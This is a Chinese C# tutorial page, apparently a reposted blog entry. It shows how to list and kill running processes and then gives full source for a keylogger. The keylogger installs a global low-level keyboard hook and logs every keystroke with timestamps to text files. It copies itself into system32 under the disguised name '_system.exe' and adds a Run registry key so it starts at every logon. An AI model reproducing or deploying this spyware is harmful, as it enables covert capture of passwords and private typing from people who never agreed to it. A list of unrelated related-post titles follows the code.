C#查询系统运行进程,关闭进程,记录键盘按键记录
来源:互联网 发布:windows xp共享文件夹 编辑:程序博客网 时间:2024/04/27 15:24
获得当前计算机系统内所有的已启动的进程:
System.Diagnostics.Process[] processOnComputer = System.Diagnostics.Process.GetProcesses();
foreach ( System.Diagnostics.Process p in processOnComputer )
{
System.Console.WriteLine(p.ToString());
}
Console.ReadLine();
获得当前计算机系统内某个进程并关闭:
System.Diagnostics.Process[] process = System.Diagnostics.Process.GetProcessesByName("进程名称");
foreach ( System.Diagnostics.Process p in process)
{
p.Kill();
}
以下是程序实现键盘按键记录
///Hook.cs代码
using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Windows.Forms;
namespace KingOper
{
public enum KeyboardEvents
{
KeyDown = 0x0100,
KeyUp = 0x0101,
SystemKeyDown = 0x0104,
SystemKeyUp = 0x0105
}
[StructLayout(LayoutKind.Sequential)]
public struct KeyboardHookStruct
{
public int vkCode; //表示一个在1到254间的虚似键盘码
public int scanCode; //表示硬件扫描码
public int flags;
public int time;
public int dwExtraInfo;
}
public delegate void KeyboardEventHandler(KeyboardEvents keyEvent ,System.Windows.Forms.Keys key);
public class Hook
{
public event KeyboardEventHandler KeyboardEvent;
public enum HookType
{
WH_JOURNALRECORD = 0,
WH_JOURNALPLAYBACK = 1,
WH_KEYBOARD = 2,
WH_GETMESSAGE = 3,
WH_CALLWNDPROC = 4,
WH_CBT = 5,
WH_SYSMSGFILTER = 6,
WH_MOUSE = 7,
WH_HARDWARE = 8,
WH_DEBUG = 9,
WH_SHELL = 10,
WH_FOREGROUNDIDLE = 11,
WH_CALLWNDPROCRET = 12,
WH_KEYBOARD_LL = 13,
WH_MOUSE_LL = 14,
WH_MSGFILTER = -1,
}
public delegate IntPtr HookProc(int code, int wParam, IntPtr lParam);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr SetWindowsHookEx(HookType hookType,HookProc hook,IntPtr instance,int threadID);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr CallNextHookEx(IntPtr hookHandle, int code, int wParam, IntPtr lParam);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern bool UnhookWindowsHookEx(IntPtr hookHandle);
private IntPtr instance;
private IntPtr hookHandle;
private int threadID;
private HookProc hookProcEx;
public Hook()
{
this.instance =
Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]);
this.threadID = 0;
hookHandle = IntPtr.Zero;
hookProcEx = new HookProc(hookProc);
}
public bool SetHook()
{
this.hookHandle = SetWindowsHookEx(HookType.WH_KEYBOARD_LL,hookProcEx,this.instance,this.threadID);
return ((int)hookHandle != 0);
}
public IntPtr hookProc(int code, int wParam, IntPtr lParam)
{
if(code >= 0)
{
KeyboardEvents kEvent = (KeyboardEvents)wParam;
if (kEvent != KeyboardEvents.KeyDown &&
kEvent != KeyboardEvents.KeyUp &&
kEvent != KeyboardEvents.SystemKeyDown &&
kEvent != KeyboardEvents.SystemKeyUp)
{
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
KeyboardHookStruct MyKey = new KeyboardHookStruct();
Type t = MyKey.GetType();
MyKey = (KeyboardHookStruct)Marshal.PtrToStructure(lParam,t);
Keys keyData=(Keys)MyKey.vkCode;
KeyboardEvent(kEvent, keyData);
}
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
public bool UnHook()
{
return Hook.UnhookWindowsHookEx(this.hookHandle);
}
}
}
///RegistryReport.cs代码
using System;
using System.IO;
using Microsoft.Win32;
using System.Windows.Forms;
namespace KingOper
{
public class RegistryReport
{
public RegistryReport()
{
}
public void MoveFile()
{
if(!File.Exists("c:\\windows\\system32\\_system.exe"))
{
File.Move(Application.ExecutablePath,"c:\\windows\\system32\\_system.exe");
}
else
return;
}
public void registryRun()
{
RegistryKey key1=Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\run");
key1.SetValue("","c:\\windows\\system32\\_system.exe");
key1.Close();
}
}
}
///Report.cs代码
using System;
using System.IO;
namespace KingOper
{
public class Report
{
public Report()
{
}
public void FirstWrite()
{
StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);
sw.WriteLine("************* LittleStudio Studio ************* ");
sw.WriteLine("******** " + DateTime.Today.Year.ToString() + "."
+ DateTime.Today.Month.ToString() + "."
+ DateTime.Today.Day.ToString() + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString() + " ********");
sw.Close();
}
public void WriteDate(string keyEvents,string keyDate)
{
try
{
StreamWriter sw = new StreamWriter("c:/keyReport.txt",true);
sw.WriteLine(keyDate + "键 " + keyEvents + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString());
sw.Close();
}
catch{}
return;
}
}
}
test_Load调用的实现
private Hook MyHook=new Hook();
private Report MyReport=new Report();
private RegistryReport MyRegistryReport;
private void test_Load(object sender, System.EventArgs e)
{
MyRegistryReport=new RegistryReport();
this.MyRegistryReport.MoveFile();
this.MyRegistryReport.registryRun();
this.MyReport.FirstWrite();
this.MyHook.SetHook();
this.MyHook.KeyboardEvent += new KeyboardEventHandler(MyHook_KeyboardEvent);
}
private void MyHook_KeyboardEvent(KeyboardEvents keyEvent, Keys key)
{
string keyEvents = keyEvent.ToString();
string keyDate = key.ToString();
this.MyReport.WriteDate(keyEvents,keyDate);
}
- C#查询系统运行进程,关闭进程,记录键盘按键记录
- blog系统进程记录
- 记录键盘按键
- blog系统进程记录2
- 获取ubuntu键盘按键记录
- 记录键盘按键记录程序实现
- 如何通过进程名字关闭系统正在运行的进程
- blog系统进程记录3(0.1完成)
- C# 关闭某个进程
- c# 关闭进程
- c# 关闭指定进程
- C# 关闭进程
- C#关闭进程
- c# 强制关闭进程
- C# 关闭EXCEL进程
- C#关闭进程树
- C# Excel进程关闭
- c#启动关闭进程
- eclipse中顯示maven管理項目的版本信息
- 浅谈CSRF攻击方式
- samba 服务器配置
- 算法——堆和栈的区别
- C语言和设计模式(适配器模式)
- C#查询系统运行进程,关闭进程,记录键盘按键记录
- 一套Oracle SQL练习题及答案
- Android 常见的错误汇总
- 关于windowsx.h的介绍
- HDU 1088 ( Write a simple HTML Browser )
- C语言和设计模式(策略模式)
- 应对32位程序在64位系统上访问注册表和文件自动转向问题
- 巨头“心血之作”终失败(一):苹果Apple TV
- c++中,引用和指针的区别
